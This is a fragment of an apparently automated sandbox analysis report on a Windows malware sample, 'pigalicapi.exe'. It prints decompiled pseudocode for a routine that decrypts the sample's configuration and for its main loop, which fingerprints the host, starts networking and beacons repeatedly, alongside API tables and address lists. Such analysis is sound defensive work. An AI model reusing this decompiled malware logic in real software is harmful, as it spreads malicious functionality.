                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t68 = _v800;
                                                                                                                                                                                                                                                                            							__imp__CryptHashData(_v796, _t68, 0x10, 0);
                                                                                                                                                                                                                                                                            							if(_t68 != 0) {
                                                                                                                                                                                                                                                                            								_v804 = 0;
                                                                                                                                                                                                                                                                            								_t69 = _v796;
                                                                                                                                                                                                                                                                            								__imp__CryptDeriveKey(_v12, 0x6801, _t69, 1,  &_v804); // executed
                                                                                                                                                                                                                                                                            								if(_t69 != 0) {
                                                                                                                                                                                                                                                                            									_v812 = 0x2f0;
                                                                                                                                                                                                                                                                            									_v808 = CryptDecrypt(_v804, 0, 1, 0,  &_v764,  &_v812);
                                                                                                                                                                                                                                                                            									CryptDestroyKey(_v804);
                                                                                                                                                                                                                                                                            									if(_v808 != 0) {
                                                                                                                                                                                                                                                                            										_t73 =  &_v816;
                                                                                                                                                                                                                                                                            										__imp__CryptCreateHash(_v12, 0x8003, 0, 0, _t73);
                                                                                                                                                                                                                                                                            										if(_t73 != 0) {
                                                                                                                                                                                                                                                                            											_t74 = _v816;
                                                                                                                                                                                                                                                                            											__imp__CryptHashData(_t74,  &_v780, 0x2f0, 0);
                                                                                                                                                                                                                                                                            											if(_t74 != 0) {
                                                                                                                                                                                                                                                                            												_v820 = 0;
                                                                                                                                                                                                                                                                            												_v824 = 4;
                                                                                                                                                                                                                                                                            												_t76 = _v816;
                                                                                                                                                                                                                                                                            												__imp__CryptGetHashParam(_t76, 4,  &_v820,  &_v824, 0);
                                                                                                                                                                                                                                                                            												if(_t76 != 0) {
                                                                                                                                                                                                                                                                            													_v828 = 0x10;
                                                                                                                                                                                                                                                                            													_t77 = _v816;
                                                                                                                                                                                                                                                                            													__imp__CryptGetHashParam(_t77, 2,  &_v844,  &_v828, 0);
                                                                                                                                                                                                                                                                            													if(_t77 != 0) {
                                                                                                                                                                                                                                                                            														_t78 = E01177C70( &_v28,  &_v844,  &_v28, 0x10);
                                                                                                                                                                                                                                                                            														_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                            														if((_t78 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            															E01177B70(_a12,  &_v780, 0x300);
                                                                                                                                                                                                                                                                            															_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                            															_v5 = 1;
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											__imp__CryptDestroyHash(_v816);
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							__imp__CryptDestroyHash(_v796);
                                                                                                                                                                                                                                                                            							goto L21;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L25;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}































                                                                                                                                                                                                                                                                            0x011747f9
                                                                                                                                                                                                                                                                            0x01174801
                                                                                                                                                                                                                                                                            0x01174aab
                                                                                                                                                                                                                                                                            0x01174ab1
                                                                                                                                                                                                                                                                            0x01174814
                                                                                                                                                                                                                                                                            0x01174814
                                                                                                                                                                                                                                                                            0x0117482a
                                                                                                                                                                                                                                                                            0x01174832
                                                                                                                                                                                                                                                                            0x01174850
                                                                                                                                                                                                                                                                            0x01174850
                                                                                                                                                                                                                                                                            0x0117485a
                                                                                                                                                                                                                                                                            0x01174860
                                                                                                                                                                                                                                                                            0x0117486a
                                                                                                                                                                                                                                                                            0x01174874
                                                                                                                                                                                                                                                                            0x0117488f
                                                                                                                                                                                                                                                                            0x011748b9
                                                                                                                                                                                                                                                                            0x011748be
                                                                                                                                                                                                                                                                            0x011748c1
                                                                                                                                                                                                                                                                            0x011748c7
                                                                                                                                                                                                                                                                            0x011748cd
                                                                                                                                                                                                                                                                            0x011748eb
                                                                                                                                                                                                                                                                            0x011748f3
                                                                                                                                                                                                                                                                            0x01174a90
                                                                                                                                                                                                                                                                            0x01174a96
                                                                                                                                                                                                                                                                            0x01174889
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01174889
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01174a98
                                                                                                                                                                                                                                                                            0x011748fd
                                                                                                                                                                                                                                                                            0x0117490b
                                                                                                                                                                                                                                                                            0x01174913
                                                                                                                                                                                                                                                                            0x01174919
                                                                                                                                                                                                                                                                            0x0117492c
                                                                                                                                                                                                                                                                            0x0117493c
                                                                                                                                                                                                                                                                            0x01174944
                                                                                                                                                                                                                                                                            0x0117494a
                                                                                                                                                                                                                                                                            0x01174975
                                                                                                                                                                                                                                                                            0x01174982
                                                                                                                                                                                                                                                                            0x0117498f
                                                                                                                                                                                                                                                                            0x01174995
                                                                                                                                                                                                                                                                            0x011749a9
                                                                                                                                                                                                                                                                            0x011749b1
                                                                                                                                                                                                                                                                            0x011749c5
                                                                                                                                                                                                                                                                            0x011749cc
                                                                                                                                                                                                                                                                            0x011749d4
                                                                                                                                                                                                                                                                            0x011749da
                                                                                                                                                                                                                                                                            0x011749e4
                                                                                                                                                                                                                                                                            0x01174a00
                                                                                                                                                                                                                                                                            0x01174a07
                                                                                                                                                                                                                                                                            0x01174a0f
                                                                                                                                                                                                                                                                            0x01174a11
                                                                                                                                                                                                                                                                            0x01174a2d
                                                                                                                                                                                                                                                                            0x01174a34
                                                                                                                                                                                                                                                                            0x01174a3c
                                                                                                                                                                                                                                                                            0x01174a4b
                                                                                                                                                                                                                                                                            0x01174a50
                                                                                                                                                                                                                                                                            0x01174a58
                                                                                                                                                                                                                                                                            0x01174a6a
                                                                                                                                                                                                                                                                            0x01174a6f
                                                                                                                                                                                                                                                                            0x01174a72
                                                                                                                                                                                                                                                                            0x01174a72
                                                                                                                                                                                                                                                                            0x01174a58
                                                                                                                                                                                                                                                                            0x01174a3c
                                                                                                                                                                                                                                                                            0x01174a0f
                                                                                                                                                                                                                                                                            0x01174a7d
                                                                                                                                                                                                                                                                            0x01174a7d
                                                                                                                                                                                                                                                                            0x011749b1
                                                                                                                                                                                                                                                                            0x0117498f
                                                                                                                                                                                                                                                                            0x01174944
                                                                                                                                                                                                                                                                            0x01174a8a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01174a8a
                                                                                                                                                                                                                                                                            0x01174aa5
                                                                                                                                                                                                                                                                            0x01174aa5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117485a

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 0117482A
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 01174834
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 01174850
                                                                                                                                                                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 011748EB
                                                                                                                                                                                                                                                                            • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0117490B
                                                                                                                                                                                                                                                                            • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0117493C
                                                                                                                                                                                                                                                                            • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0117496F
                                                                                                                                                                                                                                                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 01174982
                                                                                                                                                                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 011749A9
                                                                                                                                                                                                                                                                            • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 011749CC
                                                                                                                                                                                                                                                                            • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 01174A07
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 01174845
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0117481F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$Hash$AcquireContextCreateData$DecryptDeriveDestroyErrorLastParam
                                                                                                                                                                                                                                                                            • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                            • API String ID: 2739279601-947817771
                                                                                                                                                                                                                                                                            • Opcode ID: 4d358e9fc254cc6968581c1b4153832ab73d670b0105f97dd123379b7c6ddcc6
                                                                                                                                                                                                                                                                            • Instruction ID: b578499ee1c4ef282644626de0bb8ad2db9f335d1b2717feee3c8d4ce94bbbd5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d358e9fc254cc6968581c1b4153832ab73d670b0105f97dd123379b7c6ddcc6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98714075A50319ABEB3ADB54CC45FE9B77CAB48700F004198F609AA2C0DBB59BC4CF94
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 626 1173b00-1173b5c call 1171000 call 1173130 call 1172ed0 GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize call 1174510 635 1173b62-1173c8c call 1177d20 call 1175700 call 1175a00 call 1177d20 call 1179400 call 11799f0 call 1176060 call 1175e00 StrStrIA call 1171120 call 1175e30 call 1176cf0 call 1175f30 call 1179b90 WSAStartup 626->635 636 117400a-117400c ExitProcess 626->636 635->636 663 1173c92-1173cb1 635->663 664 1173cb3-1173cbb 663->664 665 1173cc0-1173cc9 663->665 664->665 666 1173ccb-1173cd4 665->666 667 1173cda-1173ce3 665->667 666->667 668 1173ce5-1173cee 667->668 669 1173cf4-1173cfd 667->669 668->669 670 1173cff-1173d07 669->670 671 1173d0c-1173d15 669->671 670->671 672 1173d17-1173d20 671->672 673 1173d26-1173d2f 671->673 672->673 674 1173d31-1173d3a 673->674 675 1173d40-1173dfd call 1177d20 call 117a700 call 117a4b0 call 1175b50 call 1178a70 673->675 674->675 686 1173dff-1173e3f call 1177d20 call 11778d0 675->686 687 1173e49 675->687 686->687 689 1173e53-1173eab call 1177970 call 1174020 687->689 697 1173eb1-1173ed9 call 1174020 689->697 698 1173f8a 689->698 706 1173f81 697->706 707 1173edf-1173efa call 1174020 697->707 700 1173f91-1173f9a 698->700 702 1173fed-1173ffa Sleep 700->702 703 1173f9c-1173fa3 700->703 702->689 704 1173fa5-1173fac 703->704 705 1173fd0-1173fd7 703->705 708 1173fc4 704->708 709 1173fae-1173fc2 704->709 705->702 710 1173fd9-1173fe3 705->710 711 1173f88 706->711 714 1173eff-1173f07 707->714 713 1173fce 708->713 709->713 710->702 711->700 713->702 715 1173f09-1173f50 call 11742e0 call 1174020 714->715 716 1173f78 714->716 722 1173f52 715->722 723 1173f59-1173f60 715->723 718 1173f7f 716->718 718->711 722->723 724 1173f76 723->724 725 1173f62-1173f70 VirtualFree 723->725 724->718 725->724
                                                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                                                            			_entry_() {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				char _v1148;
                                                                                                                                                                                                                                                                            				signed char _v1149;
                                                                                                                                                                                                                                                                            				intOrPtr _v1156;
                                                                                                                                                                                                                                                                            				char _v1556;
                                                                                                                                                                                                                                                                            				char _v9556;
                                                                                                                                                                                                                                                                            				long _v9560;
                                                                                                                                                                                                                                                                            				char _v9564;
                                                                                                                                                                                                                                                                            				char _v12068;
                                                                                                                                                                                                                                                                            				signed int _v12072;
                                                                                                                                                                                                                                                                            				char _v12076;
                                                                                                                                                                                                                                                                            				long _v12080;
                                                                                                                                                                                                                                                                            				char _v12081;
                                                                                                                                                                                                                                                                            				long _v12088;
                                                                                                                                                                                                                                                                            				long _v12092;
                                                                                                                                                                                                                                                                            				long _v12096;
                                                                                                                                                                                                                                                                            				signed int _v12100;
                                                                                                                                                                                                                                                                            				signed char _v12101;
                                                                                                                                                                                                                                                                            				long _v12108;
                                                                                                                                                                                                                                                                            				signed int _v12112;
                                                                                                                                                                                                                                                                            				void* _v12116;
                                                                                                                                                                                                                                                                            				signed char _t69;
                                                                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                                                                            				signed char _t77;
                                                                                                                                                                                                                                                                            				signed char _t79;
                                                                                                                                                                                                                                                                            				signed int _t80;
                                                                                                                                                                                                                                                                            				signed char _t85;
                                                                                                                                                                                                                                                                            				signed char _t86;
                                                                                                                                                                                                                                                                            				signed char _t87;
                                                                                                                                                                                                                                                                            				intOrPtr _t88;
                                                                                                                                                                                                                                                                            				char* _t89;
                                                                                                                                                                                                                                                                            				signed int _t97;
                                                                                                                                                                                                                                                                            				void* _t98;
                                                                                                                                                                                                                                                                            				signed int _t100;
                                                                                                                                                                                                                                                                            				signed char _t102;
                                                                                                                                                                                                                                                                            				signed char _t104;
                                                                                                                                                                                                                                                                            				signed char _t106;
                                                                                                                                                                                                                                                                            				signed char _t110;
                                                                                                                                                                                                                                                                            				signed int _t116;
                                                                                                                                                                                                                                                                            				signed int _t118;
                                                                                                                                                                                                                                                                            				char _t125;
                                                                                                                                                                                                                                                                            				signed int _t138;
                                                                                                                                                                                                                                                                            				signed int _t140;
                                                                                                                                                                                                                                                                            				intOrPtr _t143;
                                                                                                                                                                                                                                                                            				signed int _t159;
                                                                                                                                                                                                                                                                            				signed int _t161;
                                                                                                                                                                                                                                                                            				void* _t163;
                                                                                                                                                                                                                                                                            				void* _t165;
                                                                                                                                                                                                                                                                            				void* _t173;
                                                                                                                                                                                                                                                                            				void* _t177;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				E01171000(0x2f50);
                                                                                                                                                                                                                                                                            				_v8 = E01173130();
                                                                                                                                                                                                                                                                            				E01172ED0(_v8);
                                                                                                                                                                                                                                                                            				GetModuleFileNameA(0, "C:\Users\engineer\pigalicapi.exe", 0x208);
                                                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(E01175DB0); // executed
                                                                                                                                                                                                                                                                            				__imp__CoInitialize(0); // executed
                                                                                                                                                                                                                                                                            				_t69 = E01174510(_v8, 0x1183c88); // executed
                                                                                                                                                                                                                                                                            				_t165 = _t163 + 0xc;
                                                                                                                                                                                                                                                                            				if((_t69 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            					L39:
                                                                                                                                                                                                                                                                            					ExitProcess(0);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E01177D20( &_v1148,  &_v1148, 0, 0x46b);
                                                                                                                                                                                                                                                                            				E01175700( &_v1148); // executed
                                                                                                                                                                                                                                                                            				_t143 =  *0x11818a0; // 0x1183b88
                                                                                                                                                                                                                                                                            				_t74 = E01175A00( &_v1148, _t143, 0xff); // executed
                                                                                                                                                                                                                                                                            				_v1156 = _t74;
                                                                                                                                                                                                                                                                            				E01177D20(_t74, "Lyoxokxeruqp", 0, 0x12c);
                                                                                                                                                                                                                                                                            				E01179400( &_v1148, "Lyoxokxeruqp", 0xa); // executed
                                                                                                                                                                                                                                                                            				_t77 = E011799F0(); // executed
                                                                                                                                                                                                                                                                            				 *0x118435a = _t77;
                                                                                                                                                                                                                                                                            				 *0x118435d = E01176060(); // executed
                                                                                                                                                                                                                                                                            				_t79 = E01175E00(); // executed
                                                                                                                                                                                                                                                                            				 *0x118435e = _t79;
                                                                                                                                                                                                                                                                            				_t80 = StrStrIA("C:\Users\engineer\pigalicapi.exe", "svchost.exe"); // executed
                                                                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            				 *0x1184362 =  ~( ~_t80);
                                                                                                                                                                                                                                                                            				E01171120("C:\Users\engineer\pigalicapi.exe", "pigalicapi",  *0x118435a & 0x000000ff,  *0x1184362 & 0x000000ff, 0x118436c); // executed
                                                                                                                                                                                                                                                                            				_t85 = E01175E30(0); // executed
                                                                                                                                                                                                                                                                            				 *0x118435b = _t85;
                                                                                                                                                                                                                                                                            				 *0x118435f = 1; // executed
                                                                                                                                                                                                                                                                            				_t86 = E01176CF0(); // executed
                                                                                                                                                                                                                                                                            				_v1149 = _t86;
                                                                                                                                                                                                                                                                            				_t87 = E01175F30(); // executed
                                                                                                                                                                                                                                                                            				 *0x118435c = _t87 & 0x000000ff | _v1149 & 0x000000ff;
                                                                                                                                                                                                                                                                            				_t88 = E01179B90(0xffffffff);
                                                                                                                                                                                                                                                                            				_t173 = _t165 + 0x50;
                                                                                                                                                                                                                                                                            				 *0x1184364 = _t88;
                                                                                                                                                                                                                                                                            				_t89 =  &_v1556;
                                                                                                                                                                                                                                                                            				_push(_t89);
                                                                                                                                                                                                                                                                            				_push(0x202); // executed
                                                                                                                                                                                                                                                                            				L0117B1E6(); // executed
                                                                                                                                                                                                                                                                            				if(_t89 != 0) {
                                                                                                                                                                                                                                                                            					goto L39;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t125 =  *0x11819a8; // 0x1d
                                                                                                                                                                                                                                                                            					_v12081 = _t125;
                                                                                                                                                                                                                                                                            					 *0x1184378 = 0x10;
                                                                                                                                                                                                                                                                            					if(( *0x118435f & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_t118 =  *0x1184378; // 0x1b
                                                                                                                                                                                                                                                                            						 *0x1184378 = _t118 | 0x00000008;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(( *0x118435c & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_t161 =  *0x1184378; // 0x1b
                                                                                                                                                                                                                                                                            						 *0x1184378 = _t161 | 0x00000001;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(( *0x118435b & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_t140 =  *0x1184378; // 0x1b
                                                                                                                                                                                                                                                                            						 *0x1184378 = _t140 | 0x00000004;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(( *0x118435e & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_t116 =  *0x1184378; // 0x1b
                                                                                                                                                                                                                                                                            						 *0x1184378 = _t116 | 0x00000002;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(( *0x1184360 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_t159 =  *0x1184378; // 0x1b
                                                                                                                                                                                                                                                                            						 *0x1184378 = _t159 | 0x00000020;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t91 =  *0x1184361 & 0x000000ff;
                                                                                                                                                                                                                                                                            					if(( *0x1184361 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_t138 =  *0x1184378; // 0x1b
                                                                                                                                                                                                                                                                            						 *0x1184378 = _t138 | 0x00000040;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v9564 = 0x9c3;
                                                                                                                                                                                                                                                                            					E01177D20(_t91,  &_v12068, 0, 0x9c4);
                                                                                                                                                                                                                                                                            					E0117A700();
                                                                                                                                                                                                                                                                            					E0117A4B0( &_v12068,  &_v9564, 0x1183cb6,  *0x1183cb4 & 0x0000ffff);
                                                                                                                                                                                                                                                                            					_v9560 = 0;
                                                                                                                                                                                                                                                                            					_t97 = E01175B50( &_v12068, ";",  &_v9560, 0); // executed
                                                                                                                                                                                                                                                                            					_v12072 = _t97;
                                                                                                                                                                                                                                                                            					_v12092 = 0;
                                                                                                                                                                                                                                                                            					_v12080 = 0;
                                                                                                                                                                                                                                                                            					_v12076 = 0x4b0;
                                                                                                                                                                                                                                                                            					_t98 = E01178A70(0x1182c34,  &_v12076, 0x1182ba8, 0x8c, 0x117e008, 0x254); // executed
                                                                                                                                                                                                                                                                            					_t177 = _t173 + 0x44;
                                                                                                                                                                                                                                                                            					if(_t98 != 0) {
                                                                                                                                                                                                                                                                            						E01177D20( &_v9556,  &_v9556, 0, 0x1f40);
                                                                                                                                                                                                                                                                            						E011778D0(0x1182c34, 0xc8,  &_v9556, 0xc8);
                                                                                                                                                                                                                                                                            						_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                            						_v12092 =  &_v9556;
                                                                                                                                                                                                                                                                            						_v12080 = 0xc8;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v12088 = 0;
                                                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                                                            					_v12101 = 0;
                                                                                                                                                                                                                                                                            					_v12108 = 0x1d4c0;
                                                                                                                                                                                                                                                                            					_v12096 = 0;
                                                                                                                                                                                                                                                                            					_t100 = E01177970( &_v12096); // executed
                                                                                                                                                                                                                                                                            					_v12100 = _t100;
                                                                                                                                                                                                                                                                            					_t102 = E01174020(_v12096, _v12100,  &_v1148, 1, 2, 0);
                                                                                                                                                                                                                                                                            					_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                            					if((_t102 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_v12101 = 1;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t104 = E01174020(_v12092, _v12080,  &_v1148, 1, 5, 0);
                                                                                                                                                                                                                                                                            						_t177 = _t177 + 0x18;
                                                                                                                                                                                                                                                                            						if((_t104 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            							_v12101 = 1;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_t106 = E01174020(_v9560, _v12072,  &_v1148, 3, 0xa, 1); // executed
                                                                                                                                                                                                                                                                            							_t177 = _t177 + 0x18;
                                                                                                                                                                                                                                                                            							if((_t106 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            								_v12101 = 1;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v12116 = 0;
                                                                                                                                                                                                                                                                            								_v12112 = E011742E0( &_v12116);
                                                                                                                                                                                                                                                                            								_t110 = E01174020(_v12116, _v12112,  &_v1148, 1, 0x17, 0);
                                                                                                                                                                                                                                                                            								_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                            								if((_t110 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            									_v12101 = 1;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if(_v12116 != 0) {
                                                                                                                                                                                                                                                                            									VirtualFree(_v12116, 0, 0x8000);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if((_v12101 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						if( *0x11818a4 != 1) {
                                                                                                                                                                                                                                                                            							if( *0x11818a4 == 2) {
                                                                                                                                                                                                                                                                            								 *0x11818a4 = 1;
                                                                                                                                                                                                                                                                            								_v12108 = 0x1499700;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							if( *0x11830e4 != 2) {
                                                                                                                                                                                                                                                                            								_v12108 = 0x1499700;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v12108 = 0x3e8;
                                                                                                                                                                                                                                                                            								 *0x11818a4 = 2;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					Sleep(_v12108); // executed
                                                                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}





















































                                                                                                                                                                                                                                                                            0x01173b08
                                                                                                                                                                                                                                                                            0x01173b12
                                                                                                                                                                                                                                                                            0x01173b19
                                                                                                                                                                                                                                                                            0x01173b2d
                                                                                                                                                                                                                                                                            0x01173b38
                                                                                                                                                                                                                                                                            0x01173b40
                                                                                                                                                                                                                                                                            0x01173b4f
                                                                                                                                                                                                                                                                            0x01173b54
                                                                                                                                                                                                                                                                            0x01173b5c
                                                                                                                                                                                                                                                                            0x0117400a
                                                                                                                                                                                                                                                                            0x0117400c
                                                                                                                                                                                                                                                                            0x0117400c
                                                                                                                                                                                                                                                                            0x01173b70
                                                                                                                                                                                                                                                                            0x01173b7f
                                                                                                                                                                                                                                                                            0x01173b8c
                                                                                                                                                                                                                                                                            0x01173b9a
                                                                                                                                                                                                                                                                            0x01173ba2
                                                                                                                                                                                                                                                                            0x01173bb4
                                                                                                                                                                                                                                                                            0x01173bca
                                                                                                                                                                                                                                                                            0x01173bd2
                                                                                                                                                                                                                                                                            0x01173bd7
                                                                                                                                                                                                                                                                            0x01173be1
                                                                                                                                                                                                                                                                            0x01173be6
                                                                                                                                                                                                                                                                            0x01173beb
                                                                                                                                                                                                                                                                            0x01173bfa
                                                                                                                                                                                                                                                                            0x01173c02
                                                                                                                                                                                                                                                                            0x01173c06
                                                                                                                                                                                                                                                                            0x01173c2a
                                                                                                                                                                                                                                                                            0x01173c34
                                                                                                                                                                                                                                                                            0x01173c3c
                                                                                                                                                                                                                                                                            0x01173c41
                                                                                                                                                                                                                                                                            0x01173c48
                                                                                                                                                                                                                                                                            0x01173c4d
                                                                                                                                                                                                                                                                            0x01173c53
                                                                                                                                                                                                                                                                            0x01173c64
                                                                                                                                                                                                                                                                            0x01173c6c
                                                                                                                                                                                                                                                                            0x01173c71
                                                                                                                                                                                                                                                                            0x01173c74
                                                                                                                                                                                                                                                                            0x01173c79
                                                                                                                                                                                                                                                                            0x01173c7f
                                                                                                                                                                                                                                                                            0x01173c80
                                                                                                                                                                                                                                                                            0x01173c85
                                                                                                                                                                                                                                                                            0x01173c8c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01173c92
                                                                                                                                                                                                                                                                            0x01173c92
                                                                                                                                                                                                                                                                            0x01173c98
                                                                                                                                                                                                                                                                            0x01173c9e
                                                                                                                                                                                                                                                                            0x01173cb1
                                                                                                                                                                                                                                                                            0x01173cb3
                                                                                                                                                                                                                                                                            0x01173cbb
                                                                                                                                                                                                                                                                            0x01173cbb
                                                                                                                                                                                                                                                                            0x01173cc9
                                                                                                                                                                                                                                                                            0x01173ccb
                                                                                                                                                                                                                                                                            0x01173cd4
                                                                                                                                                                                                                                                                            0x01173cd4
                                                                                                                                                                                                                                                                            0x01173ce3
                                                                                                                                                                                                                                                                            0x01173ce5
                                                                                                                                                                                                                                                                            0x01173cee
                                                                                                                                                                                                                                                                            0x01173cee
                                                                                                                                                                                                                                                                            0x01173cfd
                                                                                                                                                                                                                                                                            0x01173cff
                                                                                                                                                                                                                                                                            0x01173d07
                                                                                                                                                                                                                                                                            0x01173d07
                                                                                                                                                                                                                                                                            0x01173d15
                                                                                                                                                                                                                                                                            0x01173d17
                                                                                                                                                                                                                                                                            0x01173d20
                                                                                                                                                                                                                                                                            0x01173d20
                                                                                                                                                                                                                                                                            0x01173d26
                                                                                                                                                                                                                                                                            0x01173d2f
                                                                                                                                                                                                                                                                            0x01173d31
                                                                                                                                                                                                                                                                            0x01173d3a
                                                                                                                                                                                                                                                                            0x01173d3a
                                                                                                                                                                                                                                                                            0x01173d40
                                                                                                                                                                                                                                                                            0x01173d58
                                                                                                                                                                                                                                                                            0x01173d60
                                                                                                                                                                                                                                                                            0x01173d80
                                                                                                                                                                                                                                                                            0x01173d88
                                                                                                                                                                                                                                                                            0x01173da7
                                                                                                                                                                                                                                                                            0x01173daf
                                                                                                                                                                                                                                                                            0x01173db5
                                                                                                                                                                                                                                                                            0x01173dbf
                                                                                                                                                                                                                                                                            0x01173dc9
                                                                                                                                                                                                                                                                            0x01173df3
                                                                                                                                                                                                                                                                            0x01173df8
                                                                                                                                                                                                                                                                            0x01173dfd
                                                                                                                                                                                                                                                                            0x01173e0d
                                                                                                                                                                                                                                                                            0x01173e2b
                                                                                                                                                                                                                                                                            0x01173e30
                                                                                                                                                                                                                                                                            0x01173e39
                                                                                                                                                                                                                                                                            0x01173e3f
                                                                                                                                                                                                                                                                            0x01173e3f
                                                                                                                                                                                                                                                                            0x01173e49
                                                                                                                                                                                                                                                                            0x01173e53
                                                                                                                                                                                                                                                                            0x01173e53
                                                                                                                                                                                                                                                                            0x01173e5a
                                                                                                                                                                                                                                                                            0x01173e64
                                                                                                                                                                                                                                                                            0x01173e75
                                                                                                                                                                                                                                                                            0x01173e7d
                                                                                                                                                                                                                                                                            0x01173e9e
                                                                                                                                                                                                                                                                            0x01173ea3
                                                                                                                                                                                                                                                                            0x01173eab
